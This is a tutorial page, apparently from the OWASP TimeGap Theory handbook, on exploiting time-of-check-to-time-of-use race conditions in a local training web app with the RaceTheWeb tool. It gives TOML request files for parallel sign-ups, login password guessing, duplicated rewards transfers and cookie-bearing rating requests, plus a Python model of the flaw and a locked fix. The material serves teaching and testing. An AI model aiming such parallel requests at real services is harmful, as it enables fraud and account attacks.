# More Tools

![](https://774439876-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFm3n1MOvAFn50v_dX2%2F-MQTO5mIOWvpeDkAdbRI%2F-MQTPVUo0hYxC2iP9tuI%2Fimage.png?alt=media\&token=f418d82e-5868-4052-bd3f-aa8ae607e6c2)

Using a tool can help you find and exploit TOCTOU issues. There are a couple of such tools available in the open-source world:

| Name              | Notes                                                                                                                                                                        |
| ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Browser Dev Tools | <ul><li>Very easy to find</li><li>Comes with major browsers</li><li>Does not support sending cookies</li></ul>                                                               |
| cURL              | <ul><li>Easy to get</li><li>Works on almost all the platforms</li><li>Supports sending cookies</li><li><a href="https://curl.haxx.se/">https://curl.haxx.se/</a></li></ul> |

We will solve the last challenge using RaceTheWeb. The executable files for RaceTheWeb can be obtained from <https://github.com/aaronhnatiw/race-the-web/releases>.

Which version to download? It depends on the operating system you are running.

| **Operating System** | **File to be downloaded**          |
| -------------------- | ---------------------------------- |
| Linux 32-bit         | race-the-web\_2.0.1\_lin32.bin     |
| Linux 64-bit         | race-the-web\_2.0.1\_lin64.bin     |
| macOS 32-bit         | race-the-web\_2.0.1\_osx32.app.zip |
| macOS 64-bit         | race-the-web\_2.0.1\_osx64.app.zip |
| Windows 32-bit       | race-the-web\_2.0.1\_win32.exe     |
| Windows 64-bit       | race-the-web\_2.0.1\_win64.exe     |

On Linux and macOS machines, you need to make the file executable.

| **Downloaded file**                | **Command to run on Terminal**                                            |
| ---------------------------------- | ------------------------------------------------------------------------- |
| race-the-web\_2.0.1\_lin32.bin     | chmod +x race-the-web\_2.0.1\_lin32.bin                                   |
| race-the-web\_2.0.1\_lin64.bin     | chmod +x race-the-web\_2.0.1\_lin64.bin                                   |
| race-the-web\_2.0.1\_osx32.app.zip | <p>Extract the zip file</p><p>chmod +x race-the-web\_2.0.1\_osx32.app</p> |
| race-the-web\_2.0.1\_osx64.app.zip | <p>Extract the zip file</p><p>chmod +x race-the-web\_2.0.1\_osx64.app</p> |

Running RaceTheWeb is easy:

1. Open command prompt/Terminal
2. Navigate to the directory where you have extracted/downloaded the executable binary file
3. Run the following command:

![Screenshot of the command to run](https://774439876-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2Fowasp-timegaptheory-handbook%2F-MQT36LmsBPX4w1E2fDz%2F-MQTEVsgufUB-zUfIttZ%2F2.png?generation=1610046378649913&alt=media)

**race-the-web portion:**

Depending on the operating system you are using, the race-the-web portion needs to be changed.

| **Operating System** | **race-the-web portion**         |
| -------------------- | -------------------------------- |
| Linux 32-bit         | ./race-the-web\_2.0.1\_lin32.bin |
| Linux 64-bit         | ./race-the-web\_2.0.1\_lin64.bin |
| macOS 32-bit         | ./race-the-web\_2.0.1\_osx32.app |
| macOS 64-bit         | ./race-the-web\_2.0.1\_osx64.app |
| Windows 32-bit       | race-the-web\_2.0.1\_win32.exe   |
| Windows 64-bit       | race-the-web\_2.0.1\_win64.exe   |

**\<toml-file> portion:**

TOML stands for Tom’s Obvious Minimal Language. The TOML file you supply should contain the request details so that race-the-web can send them.

TOML files for some of the TimeGap Theory challenges are given below:

### Sign Up page

```
# Sign Up

count = 10
verbose = false

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/sign-up.php"
   body = "firstname=tom&password=tom&email=tom%40example.com&rewards=100"

```

In the above TOML file:

* `count` defines how many requests the RaceTheWeb tool sends in parallel
* `verbose` defines the verbosity level of the output that is displayed on the screen. Its value can be either true or false
* `method` defines the type of the request. This can be GET, POST, PUT, DELETE etc.
* `url` is the URL to which the request is sent
* `body` is the body of the request. You can skip this part if there is no body that needs to be submitted

### Sign In page

```
# Sign In Page

count = 1
verbose = true

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = "email=tom%40sechow.com&password=1234&submit=Submit"

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = "email=tom%40sechow.com&password=password&submit=Submit"

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = "email=tom%40sechow.com&password=tom&submit=Submit"

```

In the above TOML file:

* Count is 1. However, there are three requests in the file, so the RaceTheWeb tool will send three parallel requests
* The first two requests have the wrong password in the request body

### Transfer rewards page

```
# Transfer Rewards

count = 10
verbose = false

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/transfer-rewards.php"
   body = "from=tom%40sechow.com&to=jerry%40sechow.com&amount=100&submit=Submit"

```
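
A model of the check-then-act flaw that the Transfer Rewards file above is meant to exercise, as an added example (not code from TimeGap Theory or RaceTheWeb). `Account`, `transfer_vulnerable`, `transfer_hardened` and `race` are hypothetical names, and the starting balance of 100 is an assumption; the run replays `count = 10` parallel transfers of 100 with the check outside and then inside a lock.

```python
import threading

class Account:
    """In-memory stand-in for one user's rewards balance (constructed)."""
    def __init__(self, balance):
        self.balance = balance
        self._row = threading.Lock()  # each single update is atomic, like one SQL UPDATE
        self.txn = threading.Lock()   # taken only by the hardened path

    def add(self, delta):
        with self._row:
            self.balance += delta

def transfer_vulnerable(src, dst, amount, gap):
    if src.balance < amount:   # time of check
        return False
    gap()                      # the time gap: other requests run the same check here
    src.add(-amount)           # time of use, based on a possibly stale check
    dst.add(amount)
    return True

def transfer_hardened(src, dst, amount, gap):
    # Check and update form one critical section, so a second request
    # cannot read the balance until the first one has debited it.
    with src.txn:
        return transfer_vulnerable(src, dst, amount, gap)

def race(transfer, count=10, amount=100, start=100):
    """Fire `count` parallel transfers; return (successes, sender, receiver)."""
    tom, jerry = Account(start), Account(0)
    barrier = threading.Barrier(count)

    def gap():
        # Hold each request inside the gap until all have passed the check;
        # give up after 0.5 s when the others are blocked on the lock.
        try:
            barrier.wait(timeout=0.5)
        except threading.BrokenBarrierError:
            pass

    results = []
    workers = [threading.Thread(target=lambda: results.append(transfer(tom, jerry, amount, gap)))
               for _ in range(count)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return sum(results), tom.balance, jerry.balance

if __name__ == "__main__":
    print("vulnerable:", race(transfer_vulnerable))
    print("hardened:  ", race(transfer_hardened))
```

In a database-backed application the equivalent of the lock is running the check and the debit in one transaction with a row lock, or a single conditional UPDATE.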

### Ratings page

```
# Ratings page

count = 1
verbose = false

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
   body = "token=ae13e0f1df6412dc4b9e2a9a3354320b6c1f3a65160bcffb552495759870afa3"
   cookies = ["PHPSESSID=80c3ffddbfe4771dd408b3c53d4a7a44"]

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
   body = "token=bc5091b2f60da51d203a58b2af1c8bd99a443751adb206814d22df79e335a3e5"
   cookies = ["PHPSESSID=fab00a2f7f46e33bb57deb4e08153e52"]

```

In the above TOML file, each request also sends a cookie, using the `cookies` key.

Now you know:

1. Various open-source tools and techniques for finding and exploiting TOCTOU security issues
2. How to use the RaceTheWeb tool for exploiting TOCTOU security issues
3. How to write TOML files for the RaceTheWeb tool
